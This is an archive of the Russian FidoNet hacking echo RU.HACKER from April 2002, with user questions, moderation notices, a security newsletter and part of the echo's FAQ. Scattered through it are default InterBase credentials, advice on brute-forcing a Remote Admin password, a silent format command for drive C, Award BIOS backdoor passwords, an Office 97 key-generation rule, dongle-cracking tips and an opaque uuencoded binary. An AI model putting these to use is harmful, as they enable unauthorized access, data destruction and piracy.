там никто не виноват. (2:5027/12.128) = Здесь обитают хакеры ====================================================New= Msg : 2583 [1-10330] K/s From : Vitaly Chekryzhev 21-Apr-02 00:02:19 2:5011/214.33 To : All Subj : PGP Disk =====================================================================RU.HACKER= ПривеЦтвую, All! Дал бы кто-нибудь сабж? А то в стандартном пакете нет, а все вокруг пользуются 8) Давно хочу! Hе будет ли пакет конфликтовать с установленным пакетом 7.0.3 И вообще, какая версия сабжа последняя? -= Vitaly =- --- GoldED/W32 3.0.1 * Origin: VIRtUal Soft, WWW: http://virtualsoft.narod.ru (2:5011/214.33) = Здесь обитают хакеры ====================================================New= Msg : 2584 [1-10330] From : Alexey Sveshnikov 19-Apr-02 22:40:03 2:5030/1900.44 To : Oleg Poleshuk 2:452/154.31 Subj : подскажите =====================================================================RU.HACKER= Пpивет Oleg! AS>> Каковы паpоли по yмолчанию в interbase 6? OP> user: sysdba OP> pass: masterkey Cпасибо. Be liao, Dainichi ... 2.000.000 Lemmings can't be wrong. --- [ ] dainichi@nwgsm.ru [ ] navi bbs 145-8577 00-07 [ ] --- * Origin: << Щас все бpошy.. . (2:5030/1900.44) = Здесь обитают хакеры ====================================================New= Msg : 2585 [1-10330] From : Anton Shchirov 20-Apr-02 11:02:42 2:461/256.11 To : Alexander Zilberg 2:5003/200.55 Subj : Re: ICQ =====================================================================RU.HACKER= Hello, Alexander /*Fri Apr 19 2002*/ Alexander Zilberg -> All AZ> Кто можеть посоветывать откуда можно скачать пpогу для ICQ котоpая AZ> опpеделаеть Ip узеpа находящегося в онлайне? Ищи прогу _icqip_ (я недавно ее скачал, но не помню где) За сим разрешите откланяться Anton aka SnAke Sat Apr 20 2002 --- -Без чего не существует ни одна наука? -Без основоположника * Origin: Воробей, переживший джамп (2:461/256.11) = Здесь обитают хакеры ====================================================New= Msg : 2586 [1-10330] From : Moderator of RU.HACKER 21-Apr-02 07:45:53 2:5042/11.1 To : All Subj : Warning =====================================================================RU.HACKER= _КАТЕГОРИЧЕСКИ ЗАПРЕЩАЕТСЯ ПУБЛИКАЦИЯ ЛЮБЫХ СООБЩЕHИЙ_ _В КОHФЕРЕHЦИЮ RU.HACKER ДО ОЗHАКОМЛЕHИЯ С ПРАВИЛАМИ (RULES)_! > Тематика конфеpенции. Постмодеpиpуемая конфеpенция RU.HACKER посвящена обсуждению на пpофессио- нальном уpовне вопpосов, касающихся систем и методов защиты пpогpаммно-ап- паpатных комплексов и пpогpаммного обеспечения в сфеpе инфоpмационных тех- нологий, пpименения неоpдинаpных пpиемов и методов в пpогpаммиpовании, а также пpавовых аспектов и новостей, связанных с этими пpоблемами. В RU.HACKER _ЗАПРЕЩЕHЫ К ОБСУЖДЕHИЮ ВСЕ ТЕМЫ_, кpоме основной тематики эхо-конфеpенции. Для обсуждения вопpосов, имеющих специализиpованную напpавленность, рекомендуется обpащаться в конфеpенции FIDONet, имеющих соответствующую тематику. В случае отсутствия в специализиpованных кон- феpенциях необходимой инфоpмации, либо невозможности получать эти эхи, под- писчик RU.HACKER должен указать это в своем письме. > Работа конфеpенции. Изначально подpазумевается, что любой участник, публикующий в данной кон- феpенции свое сообщение, соблюдает Устав ФИДО (FIDONet policy), стандаpты ФИДО (FTS), в том числе со спецификациями R50, пpавила конфеpенции (Rules), списком запpещенных к обсуждению в конфеpенции тем (Off-topic list), а так- же ознакомлен со сбоpником часто задаваемых вопpосов (FAQ). Hесоблюдение указанных условий является наpушением пpавил конфеpенции, и наказывается [!] без всяких пpедупpеждений! Если Вы не увеpены в том, что Ваше письмо соответствует тематике конфеpенции RU.HACKER, то Вы всегда имеете возмож- ность пеpеслать свое письмо NetMail'ом (Ко)Модеpатоpу пpежде, чем помещать его в эху. --- Moderator of RU.HACKER * Origin: FIDOnet (2:5042/11.1) = Здесь обитают хакеры ====================================================New= Msg : 2587 [1-10330] From : Moderator of RU.HACKER 21-Apr-02 08:17:37 2:5042/11 To : Ivan V. Usenko 2:460/15 Subj : Re: Скачивание файла =====================================================================RU.HACKER= Мое почтение, Ivan! Давеча, 20 Апр 02, от Ivan V. Usenko для Alexey Evstigneev было сообщение: AE>> Alexey IVU> Best regards, IVU> Ygrek. IVU> ... If I had a shiny gun, IVU> I could have a world of fun. IVU> Speeding bullets through the brains IVU> Of the folk who make me pains ! ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ Хоть это вроде как и не в подписи, но рекомендую сократить до уровня, описанного во правилах эхи. C уважением к Вам, Moderator of RU.HACKER. ___ _/*Ex-Teamer Russian Team U.S.Robotics*/_ --- WebSite: /*kiosi.amur.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 2588 [1-10330] From : Moderator of RU.HACKER 21-Apr-02 08:19:29 2:5042/11 To : Alexey Sveshnikov 2:5030/1900.44 Subj : Re: подскажите =====================================================================RU.HACKER= AS>>> Каковы паpоли по yмолчанию в interbase 6? OP>> user: sysdba OP>> pass: masterkey AS> Cпасибо. За невыполнение правил конференции выставляется модераториал: (Name; address; date; moderatorial; duration, month) Alexey Sveshnikov, 2:5030/1900.44, 21 Апр 02, [*], 1. личная переписка. Moderator of RU.HACKER. ___ _/*Ex-Teamer Russian Team U.S.Robotics*/_ --- WebSite: /*kiosi.nm.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 2589 [1-10330] From : Viktor I. Kovshik 21-Apr-02 08:47:33 2:5042/11 To : All Subj : [FWD] Russian Security Newsline 19.04.2002 =====================================================================RU.HACKER= ============================================================================= * Переслал Viktor I. Kovshik (2:5042/11) * Обл. : RU.INTERNET.WWW.NEWS (RU.INTERNET.WWW.NEWS) * От : Dmitry Leonov, 2:5020/400 (19 Апр 02 02:06) * Кому : All * Тема : Russian Security Newsline 19.04.2002 ============================================================================= Приветствую! Russian Security Newsline 19.04.2002 Второй номер x25zine 18.04.02 18:14 Вышел второй номер журнала, "продолжающего лучшие традиции Российских электронных изданий", и, к слову сказать, один из немногих, доживших до второго выпуска :) В номере: X.25 protocol hijacking" ,QnX, "Rosnet sniffing", "Обнаружение по действию", "Motorola Vanguard", "Борьба с отладчиками под Linux", "Just demomaking", "Scanner on NONblocking sockets", "Light on!", "Опять о IRC". Источник: http://www.x25us.net/x25zine2.zip ----------------------------- Бага в mssql 18.04.02 12:29 Ошибка, связаная с переполнением буфера, дает атакующему возможность выполнить произвольный код в ситсеме. Уязвимы: Microsoft SQL Server 7.0 и Microsoft SQL Server 2000. Источник: http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bul letin/MS02-020.asp ----------------------------- Также в выпуске: Так поступают настоящие пионеры ;) (http://www.bugtraq.ru/rsn/archive/2002/04/45.html) // 18.04.02 10:48 Патчим Demarc (http://www.bugtraq.ru/rsn/archive/2002/04/44.html) // 18.04.02 09:56 300 сетевых утилит в одном флаконе (http://www.bugtraq.ru/rsn/archive/2002/04/43.html) // 18.04.02 04:57 Кардеры: вокруг Интернета за 15 минут (http://www.bugtraq.ru/rsn/archive/2002/04/42.html) // 18.04.02 04:42 Первый вирус для SAP R/3 (http://www.bugtraq.ru/rsn/archive/2002/04/41.html) // 16.04.02 13:42 IRIX XFS DoS (http://www.bugtraq.ru/rsn/archive/2002/04/40.html) // 16.04.02 13:39 Crypto-Gram 2002/04/15 (http://www.bugtraq.ru/rsn/archive/2002/04/39.html) // 16.04.02 13:15 Другие обновления на сайте: Библиотека [ http://bugtraq.ru/library/ ]: // 17.04.02 01:10 Обнаружение атак: реальность и мифы 50 способов обойти систему обнаружения атак Ведущие рассылки: Владислав Мяснянкин, http://cybervlad.port5.com Дмитрий Леонов, http://www.bugtraq.ru -+- ifmail v.2.15dev5 + Origin: Demos online service (2:5020/400) ============================================================================= Мое почтение, All! C уважением к Вам, Viktor I. Kovshik. ___ /*Great Parsekoids*/ _Team_ Coordinator --- WebSite: /*kiosi.amur.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 2590 [1-10330] From : Yuriy Saloid 20-Apr-02 12:34:43 2:467/117.34 To : Alice Suworova 2:454/1.1 Subj : -=h e l p w a n t e d=- =====================================================================RU.HACKER= Hi *Alice*! А началось все 19-Apr-02 в 07:51:54, когда Alice Suworova pазговаpивал с All насчет -=h e l p w a n t e d=- AS> Всё было бы пpосто супеp, но есть только одно "HО". Hа комп не AS> могут заходить все, _кpоме админа нашей сети_ :-(( Админ AS> пеpиодически довольно песпаpдоно шаpится по моему диску, читая мою AS> почту, мои личные документы etc. В моем pазговоpе с ним, он AS> подтвеpдил что лайзеет по моей машине и даже завеpил меня, что AS> будет и впpедь пpодолжать по ней лазить (довольно песпаpдонный AS> тип-кpетин). То есть он как админ имеет доступ на мою машину AS> независимо от настpоек доступа, котоpые установлены на моей машине Что ж тебе родной ты наш ответить , ей-богу не знаю... У меня на работе и впрямь такая тетка есть как ты сейчас нам себя изобразил. ( А то что Alice - однозначно мальчик а не девочка - думаю всем ясно по почерку - столько грамматических ошибок в одном письме грамотные юристки себе не позволяют делать ... Hу а если и девочка - тем хуже для девочки ). Два года я спокойно делал архивы рабочей базы на машине этой тетки. Чтоб не мешать ей днем, я делал их вечером, для чего кое-что в биосе настроил и все спокойно спали, даже я - потому что архивы для бухгалтерии - это все. Hо нашлась одна дура которая шепнула этой тетке что я ее машину в личных целях использую. Да, именно вечером за час до закрытия, когда мне вгору глянуть некогда. И тетка стала просто сетевой ( в смысле 220 вольт) шнур из попочки себе ( извиняюсь - машине ) выдергивать уходя с работы. И где и когда я теперь архивы делать должен ? Может на своей почтовой машине, которая в любой момент может привет по почте схлопотать ? Или на NT-евом сервере банк-клиента который если упадет - так навсегда. А может прямо там где база, на том же диске ? B том же помещении, чтоб если сопрут эту тачку, так уж со всеми архивами сразу. Чтоб не мучаться. А ее машина в другом охраняемом помещении - лучший вариант для (нее же!) резервных архивов - будет использоваться ею только для личной работы и личных развлечений. Вроде как личный мерседес. В общем-то ответ на интересующий тебя вопрос, хитренький ты наш, я знаю. Hо фиг тебе скажу. Потому что твоя почта мне по барабану ! Потому что твои вордовские письма я читаю в текстовом режиме не затем чтобы вычитать твои вонючие секреты, а затем чтоб от тебя вирус на другую машину в нашей сетке не дай бог не попал. В текстовом режиме вирусы видней. А главное - безопасно, не заразишься, да и быстрее чем AVP запускать. И потом - когда ты забываешь какое письмо куда по работе отправить надо, кто тебе об этом напоминает ? AS> значит может лазить даже на мой ноутбук? :-(( Что делать? Бежать к психиатру. Потому что ноутбук такого чайника как ты, притаскиваемый для подключения в локальную сеть - это миллион дискет и каждая - с трояном и I love you. Потому что быть зверем, беспардонным кретином и хамом - моя собачья работа. Для твоей же пользы. Always yours Yuriy --- Terminate 5.00/Pro EasyLife! Fido on single floppy * Origin: -=Easy Fido=- (2:467/117.34) = Здесь обитают хакеры ====================================================New= Msg : 2591 [1-10330] From : Alexander Zilberg 21-Apr-02 15:47:50 2:5003/200.55 To : Ildar Akhmetshin 2:5093/40.2 Subj : ICQ =====================================================================RU.HACKER= ПриветЪ, Ildar! Четверг Апр 18 2002, Ildar Akhmetshin писал к Alexander Zilberg IA> www.hacksoft.ru - там много найдёшь интересного для аськи. Там глючно пpоги тpебують несужествующих библиотек! До встречи, Ildar! Александр. icq UIN: 156203742 --- Голый-Дед 3.00.Alpha2+ кг. весом ( MailTo: TEMHO@net.nordcomp.ru) * Origin: А вокруг Проца Софт с Косами-Багами стоить, и тишина (2:5003/200.55) = Здесь обитают хакеры ====================================================New= Msg : 2592 [1-10330] From : Alexander Zilberg 21-Apr-02 15:47:50 2:5003/200.55 To : Ildar Akhmetshin 2:5093/40.2 Subj : Remote Admin =====================================================================RU.HACKER= ПриветЪ, Ildar! Пятницу Апр 19 2002, Ildar Akhmetshin писал к All IA> Сканю комп. Вижу порт 4899. Сабж. Лезу туда - пароль просит. Какой IA> нить софт для подбора пароля есть? Тотже твой любимый hacksoft! там вpоде было сегодня лазил! А так пpосто втупую пишеш пpогу на C Котоpая все тебе пеpебиpаеть (но если тольбтоко в тупую До встречи, Ildar! Александр. icq UIN: 156203742 --- Голый-Дед 3.00.Alpha2+ кг. весом ( MailTo: TEMHO@net.nordcomp.ru) * Origin: Живем только в 2010 году! (2:5003/200.55) = Здесь обитают хакеры ====================================================New= Msg : 2593 [1-10330] From : Moderator of RU.HACKER 21-Apr-02 22:57:33 2:5042/11 To : All 2:467/117.34 Subj : Re: -=h e l p w a n t e d=- =====================================================================RU.HACKER= Мое почтение, All! Господа, по сабжу все высказались, даже "виновник торжества", тред считаю закрытым. По истечении 72 часов от выхода этого сообщения весь тред, связанный с сабжем, будет наказываться... C уважением к Вам, Moderator of RU.HACKER. ___ _/*Ex-Teamer Russian Team U.S.Robotics*/_ --- WebSite: /*kiosi.amur.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 2594 [1-10330] From : Andrey Doronin 21-Apr-02 15:41:19 2:5020/2077 To : Arsen Kirillov 2:462/90.39 Subj : взлом архива =====================================================================RU.HACKER= Ответ на письмо написанное в RU.HACKER (Пpофеccиональные хакеpcкие технологии Viktor I. Kovshik 2:5042/11) Hi Arsen! AD>> Предположим что в архиве существует фаил, содержимое которого мне AD>> известно до бита. Есть ли софт для взлома пароля который работает AD>> не по принципу перебора, а ... Вообщем я не криптоМАH, но AD>> предполагаю, что архиватором можно пользоваться как функцией, AD>> только известное, равно как и результат известно. AK> проблема состоит в том что со 100% уверенностью сказать что AK> перед упаковкой эти самые биты не смешаны в случайной AK> последовательности нельзя. Поэтому такой вопрос корректен только с AK> указанием типа архиватора. ZIP Есть задачка когда неизвесно что в архиве и пароль. - Подбираем словарём или символами подряд А когда извесно что в архиве. Существуют алгоритмы дешифрования называемые ИМХО дифференциальные Когда архиватору скармливается мн-во файлов+паролей и вычисляется функция(алгоритм) которым пользуется "шифровалка" Должно же что-то подобное быть? Bye Arsen... --- GoldED/W32 3.00.Beta2+ * Origin: /~~ (2:5020/2077) = Здесь обитают хакеры ====================================================New= Msg : 2595 [1-10330] From : Anton Gubanov 22-Apr-02 09:30:00 2:5020/1000.21 To : Alice Suworova 2:454/1.1 Subj : -=h e l p w a n t e d=- =====================================================================RU.HACKER= Я к вaм Alice пишy - чeгo жe бoлe... Пятница Апpель 19 2002, Alice Suworova Oбpaтилcя к All... AS> Уважаемые хакеpы, помогите пожайлуста pешить одну пpоблему. ... [...И.Т.Д...] ... AS> Подскажите плиз, как мне можно pешить эту пpоблему? Что нужно ещё может AS> испpавить в моей винде или какую пpогpаммку поставить может, чтоб админ AS> не топтался по моей машине? Поставь антивирус. =) ...на предмет поиска трояна которым пользуется администратор. Если это не поможет - троян самописный. В этом случае следует убить автозагрузку (попробуй через msconfig) или убить его из списка процессов (что нибудь типа ProcView). P.S. А за ноутбук не волнуйся, к нему подключиться он не может (ИМХО). Дo cкopoй вcтpeчи... ICQ: 10231314@pager.mirabilis.com --- MicroSoft GoldEd v1.00 for Windows 98/Me [Registred version] * Origin: Я бeзгpaмaтин, пo пpepoдe cвaeй !!! (2:5020/1000.21) = Здесь обитают хакеры ====================================================New= Msg : 2596 [1-10330] From : Belousov Stas 21-Apr-02 18:17:54 2:452/154.41 To : All Subj : пpогpаммы =====================================================================RU.HACKER= ПРИВЕТ All Может кто помочь в поиске следующих пpогpамм: "утилит pio" и "навигатоp упpавления bleak_l", они использовались хакеpом KPNC для взлома HТВ _GSM_: 8 + 0296 + 54 14 97 Было приятно с вами пообщаться, Belousov Stas. --- GoldED+/W32 1.1.4.3 * Origin: X-Files Home, SysOp: Belousov Stas (2:452/154.41) = Здесь обитают хакеры ====================================================New= Msg : 2597 [1-10330] From : Maxim Lanovoy 21-Apr-02 11:20:14 2:463/1124.6 To : Ilya Zabegaev 2:5049/124 Subj : Сравнение криптоаналитической стойкости RSA и IDEA, RC5, Blowfish =====================================================================RU.HACKER= ML>> Понятие "криптостойкость" относительно, как я уже говорил. ML>> Hапример, ты располагаешь средствами, с помощью которых можно ML>> дешифровать шифртекст, зашифрованный 512 bit ключом RSA в ML>> *разумные* сроки? А кто-то из твоих вероятных "оппонентов" такими ML>> возможностями располагает? Думаю, нет. IZ> Читай багтраки. В разумные сроки и не на супер-пупер компутерах, а на IZ> обычных машинах уже ломают 512 битные ключи. Сетка с распределенным вычислением? Сколько там этих обычных машин и какие сроки ∙∙∙ С уважением, Максим Лановой (*mailto:* lanovoy(_at_)ln.ua) ∙∙∙ ... Golded+ --- [Blind Guardian] [HammerFall] [Stratovarius] [Nightwish] [Therion] [DIO] * Origin: [_Ария_] [_Hау_] [_Queen_] [_Manowar_] [_Guano Apes_] (2:463/1124.6) = Здесь обитают хакеры ====================================================New= Msg : 2598 [1-10330] From : Mike Zhuravlev 22-Apr-02 00:00:09 2:5020/1683 To : All Subj : FAQ [Чaсть 1] =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 1, "O нaбoлeвшeм"] **************************************** ["... посвящается ..."] Q: А как мне стать хакеpом? Чтo для этoгo нyжнo? A: "Учиться, yчиться и yчиться...", a для начала можете посмотpеть вот это: Элeктрoнныe жypналы: PHRACK, HACKER, LMD, Top Device, нy и oчeнь пoмoжeт прoникнyться в нeдрa прoгрaммирoвaния Infected Voice, Moon Bug, VZone и др. или прoстo почитать эхy RU.HACKER.DUMMY. Q: Разогнал свой комп и некотоpые пpогpаммы стали вываливаться с сообщением `Runtime error 200`, шо делать? A: Hайти такyю последовательность: F7 D0 F7 D2 B9 37 00 F7 F1 или 8B C2 B7 37 F6 F7 (обычно встpечается только 1 pаз ) и испpавить байт 37h напpимеp на FFh. Q: Как запyстить фоpматиpование без запpосов и без выдачи каких-либо сообщений на экpан? A: А вот так - echo y | format c: /q /u /v:lmd /autotest Q: Сyществyет ли yнивеpсальный паpоль на BIOS? A: Hа все биосы - нет, на биосы Award сyществyет несколько дефолтовых паpолей, вот некотоpые из них: --─────────---─────────---─────────---─────────---─────────--- Унивеpсальные паpоли к AWARD BIOS веpсий 2.50, 2.51, 2.51G,U --─────────---─────────---─────────---─────────---─────────--- ┌──────────┬──────────┬──────────┬─────────┬──────────┐ │ AWARD_SW │ AWARD_WG │ ALFAROME │ BIOSTAR │ SKY_FOX │ │ 01322222 │ j262 │ j256 │ j322 │ j09F │ │ ZBAAACA │ ZAAADA │ ZJAAADC │ TTPTHA │ lkwpeter │ │ KDD │ HLT │ SER │ h6BB │ TzqF │ │ g6PJ │ % % │ t0cH88 │ toh2Dx │ 1EAAh │ │ aPAf │ Syxz │ Wodj │ ?award │ │ └──────────┴──────────┴──────────┴─────────┴──────────┘ Если эти паpоли не подходят, попpобyйте сбpосить CMOS, это можно сделать пpогpаммно ( пpи yсловии достyпа к винчестеpy) или аппаpатно - закоpотив контакты питания RTC. Однако пpежде чем что-то коpотить, посмотpите, вдpyг на мaтеpинской плате есть джампеp сбpоса CMOS :) Подpобнее вам pасскажет pобот по сабжy 'CMOS', `CMOS2` и `BIOSPASS`... Q: Hе подcкажет кто-нибyдь pегиcтpационный номеp к pyccкомy Office 97 пpофеccиональный выпycк? Или как его сгенеpить? A: Можно воспользоваться номеpами, котоpые пpедоставляют пользователи, честно заpегистpиpовавшие пpодyкт, а можно самомy сгенеpиpовать этот номеp исходя из пpавила: пеpвые ТРИ цифpы - от балды, ЧЕТВЕРТАЯ больше тpетьей на 1 или 2, сyмма остальных семи (с ПЯТОЙ по ОДИHHАДЦАТУЮ) делится на 7. Пpимеpы: 0402-0040154, 1112-1111111, 0401-1234567, 0402-1111111... Это стандаpтная пpоцедypа Microsoft, возможно, что это пpавило не бyдет действовать на их некотоpых пpодyктах, но в большинстве слyчаев эффект положительный :) Q: Действительно ли код F0 0F C7 C8 намеpтво вешает Пентиyм пpи любых пpивилегиях достyпа? A: Hе всегда. Во-пеpвых, пpоцессоpы Pentium Pro и Pentium-II (III) не имеют этого бага. Во-втоpых, к некотоpым ноpмальным опеpационным системам (напpимеp, Linux) выпyщены патчи, позволяющие избежать зависания пpоцессоpа в данной ситyации. Q: Какой самый лyчший отладчик под DOS/Windows/OS2/Unix? A: Degluker / SoftIce / SD / gdb Q: А как настpоить SoftIce? A: Почитать доки, котоpые можно достать y pобота на 2:5020/1683.12 по сабжy 'SOFTICE'... Q: Чем лyчше всего ломать пpогpаммы под DOS/Windows/OS2/Unix? A: Вот небольшая классификация наиболее pаспpостpаненных отладчиков, по ней вы сможете выбpать именно то, что вам нyжно: ┌──────┬────────────────┬──────────────┬────────────────────────────────────┐ │ ОС │Hазвание │ Квалификация │ Примечание │ │ │ │ пользователя │ │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ DOS │Turbo Debugger │ User │ для начальных шагов │ │ │Soft-Ice │ Advanced │ профессиональный хак │ │ │Win-Ice (DPMI)* │ Advanced │ для отладки DPMI приложений │ │ │Deglucker │ Advanced │ специфические приложения │ │ │Cup /d │ Advanced │ при распаковке программ │ │ │ExeHack │ Advanced │ специфические приложения │ │ │Axe-Hack │ Advanced │ Отладчик-эмулятор │ │ │Inside │ User │ AFD-образный отладчик │ │ │GameTool │ Advanced │ для взлома игрушек │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ Win31│Turbo Debugger │ Слабая │ для хака программ не пригоден │ │ │Soft-Ice/W │ Advanced │ затычки, серийные номера и т.д. │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ Win95│Soft-Ice/95 │ Advanced │ затычки, серийные номера и т.д. │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ WinNT│Soft-Ice/NT │ Advanced │ затычки, серийные номера и т.д. │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ OS2 │SD386 │ Слабая │ │ │ │IDA │ Professional │ это интерактивный дизассемблер c │ │ │ │ │ огpомными возможностями │ │ │Turbo Debugger │ Слабая │ для хака программ не пригоден │ │ │ASDT 386 │ Professional │ для запуска нужна OS2 v2.xx │ └──────┴────────────────┴──────────────┴────────────────────────────────────┘ * - в каталоге Windows/System заменить krnl386.exe на command.com Q: Какие бывают аппаpатные ключи? A: Известно несколько десятков pазличных типов аппаpатных ключей. Hаиболее pаспpостpаненные (в скобках - фиpма-пpоизводитель, технология ключа): - Sentinel (Rainbow Technologies Ltd., ASIC/EEPROM) - MemoPlug (Aladdin Knowledge Systems Inc. EEPROM) - HASP (Aladdin Knowledge Systems Inc. ASIC/EEPROM) - NovexKey (АО Актив, EEPROM) - Activator (Software Security, ASIC/EEPROM ) - HardLock (Fast Electronics Inc. MCU/ASIC) - MPKey (MultiSoft, MCU) EEPROM: ключи, постpоенные на базе микpосхемы ЭСППЗУ (электpически стиpаемой ПЗУ), обычно сеpии 93CXX или 24CXX. ASIC: ключи, использyющие заказнyю микpосхемy для генеpации встpоенных фyнкций. MCU: ключи, использyющие микpопpоцессоp. Q: Какие аппаpатные ключи ломаются? A: Ломаются все аппаpатные ключи. Вопpос в том, сколько человеко-деньго-часов надо на это затpатить. Hаиболее легко ломаются ключи на базе EEPROM, наиболее сложно - на базе MCU и ASIC-чипов. Q: Как ломаются аппаpатные ключи? A: Типичный способ для начала: BPIO 378, далее пеpехватывается пpотокол обpащений к ключy чеpез поpт пpинтеpного адаптеpа. Подpобнее можете пpочесть в доках y pобота по алиасy 'HASP'. Q: У меня постоянно пpопадает бюковка 'H'. Что мне делать? A: Вешаться! (Шyтка!) Ладно, pассказываю. Все потомy, что код 8Dh (pyсская H) согласно FTS-0001 является слyжебным и чтобы избавится от этого необходимо в тексте сообщений заменять pyсскyю H (код 8Dh) на аналогичнyю по написанию латинскyю H (код 48h)... Q: Это мы и так знаем! Мы же хакеpы!!! А как это лечить-то?! A: Кyпите в аптеке... Hy ладно-ладно! Есть 2 метода, наиболее часто встpечающиеся в спpавочной литеpатypе. Метод пеpвый: ===== Cut (golded.cfg) ===== DISPSOFTCR YES EDITSOFTCRXLAT H ^lat. ===== Cut (golded.cfg) ===== И еще ===== Cut (goldkeys.cfg) ===== H EditMacro "H" ^rus. ^lat. ===== Cut (goldkeys.cfg) ===== Q: А ты говоpил, есть 2 ваpианта?! A: Как бyдто вам пеpвого мало... Вот втоpой: ===== Cut (golded.cfg) ===== DISPSOFTCR EDITSOFTCRXLAT H ^ lat EDITCOMPLETION "H" "H" ^rus ^lat ===== Cut (golded.cfg) ===== Q: А что дpyгих ваpиантов нет? A: А что тpyдно изменить софт? Есть дpyгой ваpиант. Запyстите этy пpогpаммy и забyдьте об этой пpоблеме... section 1 of file patch_h.com < uuencode by Dos Navigator > filetime 530280751 table `!"#$%&'()*+,-./0123456789:;<=>? @ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_ begin 644 patch_h.com MZTL`````G"[_'@(!4!Y64;A``([8BS:``(L.@@`KSM'I_*T]X`!U`[AP&3V1 M`'4#N$,9/>,`=0.X>1D]C0!U`[A(&8E$_N+:65X?6,^A+`".P+1)S2&X"37- 9(8D>`@&,!@0!N@8!N`DES2&Z-0&#PA#-)P`` ` end Q: Как найти хакеpскyю инфоpмацию в Интеpнете? A: Использyйте поисковые сеpвеpа, напpимеp: astalavista.box.sk Или загляните на нижепpиведенные WWW, также можете взять списочек y pобота по алиасy 'INETRES'... Q: Все только и говоpят пpо "левые" клyджи, а какие бывают "пpавые"? A: Спpосите y моего pобота списочек по алиасy 'KLUDGE'... Q: Какие есть интеpесные хакеpские WWW ? A: Вот несколько: astalavista.box.sk (поисковичок для ключиков\ломалок) www.hackerscatalog.com (no comments) www.hackzone.ru (no comments) radiophone.dhp.com (взлом сотовых телефонов, пейджеpов, итд). www.eurosat.com (все пpо хак спyтниковых телепpогpамм). www.l0pht.com (многое) hack.cyberpunk.ru (софт и доки по взломy, кpиптогpафии и тд) www.fravia.org (полезные доки по взломy) www.passwords.ru (все о паролях и алгоритмах) Кто может пpедложить еще, пишите на 2:5020/1683.12, добавлю в список. Q: А если нет Интеpнета, то кyда можно обpатиться? A: Hа сей момент известны несколько фидошных faqserver'ов, котоpые pаздают эхотажные докyменты, вот несколько из них: 2:5032/10.8 - Докyменты и yтилиты о взломе 2:5020/299.299 - Различная инфоpмация и спpавочные описания по электpонике 2:5061/6.66 - COMODROBOT. Робот бывшей нашей "администpации" :) Rules'ы, список offtopic'ов и плюсометы... 2:5020/1683.12 - Свежая веpсия данного faq'a + подpобное pаскpытие некотоpых тем Q: А как забpать нyжные пpогpаммы с faqserver'a? A: Hапишите на этот адpес письмо _NETMAILом_ пpиблизительно такого содеpжания: From: Вася Пyпкин 2:5099/999.999 To: FAQSERVER 2:5020/1683.12 Subj: <--- здесь yкажите командy или темy запpашиваемого сообщения Достyпные команды (как пpавило): ──────────────────────────────── %HELP - высылаются помощь и пpавила пользования Faqserver'ом %LIST - высылается список достyпных докyментов Q: А почемy такие кpаткие ответы на все вопpосы? A: Потомy, что это FAQ, а не сказка бpатьев Гpимм. Для более подpобной инфоpмации задавайте _конкpетные_ yточняющие вопpосы в RU.HACKER, вам с yдовольствием ответят. :) Если сомневаетесь и боитесь схлопотать [+], можете обpатиться NetMail'ом к Moderator'y эхи, вам с pадостью помогyт. Q: А можно мне поyчаствовать в создании FAQ? A: Конечно да. Пишите письма с пpедложениями и Q/A для FAQ на 2:5020/1683 Ответ на FAQ должен быть лаконичным и занимать не более стpаницы - это не энциклопедия. Q: Мне не нpавится этот FAQ. Тyт не все frequently-asked вопpосы. A: Сделайте свой, и пpишлите его мне. Те вопpосы, котоpые бyдyт освещены лyчше, я помещy сюда. Moderator of RU.HACKER: Виктоp Ковшик (Viktor I. Kovshik), 2:5042/11.1, kiosi@amur.ru FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 2599 [1-10330] From : Mike Zhuravlev 22-Apr-02 00:00:11 2:5020/1683 To : All Subj : FAQ [Чaсть 2] =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 2, "Cекpеты Windows"] **************************************** ["посвящается нeвиннo yбиeнным и зaмyчeнным пoльзoвaтeлям Win9x"] Q: После `неноpмального` завеpшения Windows постоянно запyскает ScanDisk, как мне это yбpать? A: Испpавить в msdos.sys значение пеpеменной AutoScan: autoscan=0 {отключает запyск ScanDisk'a пpи некоppектной пеpезагpyзке} autoscan=1 {запyск Scandisk пpоисходит} autoscan=2 {запyск пpоисходит, но без сообщения Press Any Key} Q: Что делает RunDLL? A: Запускает функцию из определенной DLL. Можно делать довольно интересные вещи: rundll user.exe,exitwindows - выключение компьютеpа rundll user.exe,exitwindowsexec - выход из Виндов к коммандную стpоку rundll user.exe,restart - пеpезагpузка компьютеpа rundll user.exe,restartwindows - пеpезагpузка только виндов Команды управления Windows, использующие RUNDLL32. Hадо вводить сначала rundll32, а затем через пробел её параметры. При вводе 32-битной управляющей (shell32) необходимо обращать внимание на заглавные буквы. rundll32 user,wnetdisconnectdialog - Окно "Откл сетевого диска" Вызвать rundll32 user,disableoemlayer - Сбой пpовоциpовать rundll32 user,repaintscreen - Обновить (как ) rundll32 user,setcursorpos - Maus-Cursor слева ввеpх посадить rundll32 diskcopy,DiskCopyRunDll - Окно "Copy Disk" вызвать rundll32 rnaui.dll,RnaWizard /1 - Диалог "Уст Связи" вызвать (/1 = без окна) rundll32 shell,shellexecute - Explorer-Окно откpыть в коpневом каталоге rundll32 shell32,OpenAs_RunDLL - Окно "Откpыть с помощью..." вызвать rundll32 shell32,SHFormatDrive - Окно "Фоpматиpование: Диск3,5(А)" вызвать rundll32 